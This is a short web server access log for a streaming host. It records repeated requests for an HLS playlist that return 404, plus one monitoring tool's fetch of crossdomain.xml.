154.57.7.9 - - [05/May/2024:15:49:50 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:15:49:54 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:15:50:01 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
62.210.125.163 - - [05/May/2024:15:50:03 -0400] "GET /ALBANIANTVUSA/index.m3u8 HTTP/1.1" 404 222 "-" "AppleCoreMedia/1.0.0.9A405 (iPad; U; CPU OS 5_0_1 like Mac OS X; zh_cn)" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:15:50:04 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:15:50:12 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:15:50:15 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:15:50:22 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:15:50:26 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:15:50:33 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:15:50:37 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:15:50:44 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
162.212.176.104 - - [05/May/2024:15:50:45 -0400] "GET /crossdomain.xml HTTP/1.1" 200 296 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:15:50:47 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:15:50:55 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:15:50:58 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
